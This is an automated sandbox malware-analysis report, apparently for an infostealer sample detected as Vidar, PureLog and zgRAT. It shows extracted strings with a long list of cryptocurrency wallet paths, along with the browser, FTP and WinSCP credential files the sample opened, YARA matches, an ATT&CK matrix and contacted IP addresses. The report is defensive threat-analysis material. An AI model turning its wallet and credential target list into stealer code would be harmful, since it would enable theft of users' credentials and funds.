                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: YyIDUCFWC1.exe, 00000000.00000000.1691360547.0000000000682000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: set_UseMachineKeyStore
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*"~
                            Source: MSBuild.exe, 00000001.00000002.2097165559.0000000000F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Tries to harvest and steal Bitcoin Wallet information
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                            Tries to harvest and steal ftp login credentials
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                            Tries to steal Crypto Currency Wallets
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                            Source: Yara matchFile source: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6360, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: YyIDUCFWC1.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.YyIDUCFWC1.exe.680000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1691360547.0000000000682000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Yara detected Vidar
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Yara detected Vidar stealer
                            Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.YyIDUCFWC1.exe.3e0c1e0.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.YyIDUCFWC1.exe.3e3f810.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.YyIDUCFWC1.exe.3e3f810.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.YyIDUCFWC1.exe.3e0c1e0.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.1701548677.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1701132649.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1701548677.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1709833273.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000002.2097165559.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: YyIDUCFWC1.exe PID: 5480, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6360, type: MEMORYSTR
                            Yara detected zgRAT
                            Source: Yara matchFile source: YyIDUCFWC1.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.YyIDUCFWC1.exe.680000.0.unpack, type: UNPACKEDPE
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CEEA0C0 CorBindToRuntimeEx,GetModuleHandleW,GetModuleHandleW,__cftoe,GetModuleHandleW,GetProcAddress,0_2_6CEEA0C0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBE0C40 sqlite3_bind_zeroblob,1_2_6CBE0C40
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBE0D60 sqlite3_bind_parameter_name,1_2_6CBE0D60
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB08EA0 sqlite3_clear_bindings,1_2_6CB08EA0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBE0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,1_2_6CBE0B40
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB06410 bind,WSAGetLastError,1_2_6CB06410
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB060B0 listen,WSAGetLastError,1_2_6CB060B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB0C030 sqlite3_bind_parameter_count,1_2_6CB0C030
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB06070 PR_Listen,1_2_6CB06070
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB0C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,1_2_6CB0C050
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CA922D0 sqlite3_bind_blob,1_2_6CA922D0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB063C0 PR_Bind,1_2_6CB063C0

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                            Windows Management Instrumentation                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		1
                            Disable or Modify Tools                            		2
                            OS Credential Dumping                            		2
                            System Time Discovery                            		Remote Services11
                            Archive Collected Data                            		2
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Native API                            		Boot or Logon Initialization Scripts411
                            Process Injection                            		11
                            Deobfuscate/Decode Files or Information                            		1
                            Credentials in Registry                            		1
                            Account Discovery                            		Remote Desktop Protocol4
                            Data from Local System                            		21
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts2
                            Command and Scripting Interpreter                            		Logon Script (Windows)Logon Script (Windows)3
                            Obfuscated Files or Information                            		Security Account Manager3
                            File and Directory Discovery                            		SMB/Windows Admin Shares1
                            Screen Capture                            		3
                            Non-Application Layer Protocol                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                            Software Packing                            		NTDS55
                            System Information Discovery                            		Distributed Component Object ModelInput Capture114
                            Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Timestomp                            		LSA Secrets131
                            Security Software Discovery                            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            DLL Side-Loading                            		Cached Domain Credentials31
                            Virtualization/Sandbox Evasion                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                            Masquerading                            		DCSync12
                            Process Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                            Virtualization/Sandbox Evasion                            		Proc Filesystem1
                            System Owner/User Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt411
                            Process Injection                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1427891 Sample: YyIDUCFWC1.exe Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 26 windowsupdatebg.s.llnwi.net 2->26 28 steamcommunity.com 2->28 30 2 other IPs or domains 2->30 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 10 other signatures 2->42 7 YyIDUCFWC1.exe 2 2->7         started        signatures3 process4 file5 16 C:\Users\user\AppData\...\Protect544cd51a.dll, PE32 7->16 dropped 44 Found many strings related to Crypto-Wallets (likely being stolen) 7->44 46 Writes to foreign memory regions 7->46 48 Allocates memory in foreign processes 7->48 50 Injects a PE file into a foreign processes 7->50 11 MSBuild.exe 36 7->11         started        signatures6 process7 dnsIp8 32 65.109.242.73, 443, 49733, 49734 ALABANZA-BALTUS United States 11->32 34 steamcommunity.com 23.4.32.216, 443, 49732 AKAMAI-ASUS United States 11->34 18 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 11->18 dropped 20 C:\Users\user\AppData\...\softokn3[1].dll, PE32 11->20 dropped 22 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 11->22 dropped 24 10 other files (none is malicious) 11->24 dropped 52 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->52 54 Found many strings related to Crypto-Wallets (likely being stolen) 11->54 56 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->56 58 5 other signatures 11->58 file9 signatures10

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            YyIDUCFWC1.exe26%ReversingLabsWin32.Trojan.Smokeloader
                            YyIDUCFWC1.exe27%VirustotalBrowse

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\ProgramData\freebl3.dll0%ReversingLabs
                            C:\ProgramData\mozglue.dll0%ReversingLabs
                            C:\ProgramData\msvcp140.dll0%ReversingLabs
                            C:\ProgramData\nss3.dll0%ReversingLabs
                            C:\ProgramData\softokn3.dll0%ReversingLabs
                            C:\ProgramData\vcruntime140.dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll0%ReversingLabs

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            SourceDetectionScannerLabelLink
                            fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                            windowsupdatebg.s.llnwi.net0%VirustotalBrowse

                            URLs

                            SourceDetectionScannerLabelLink
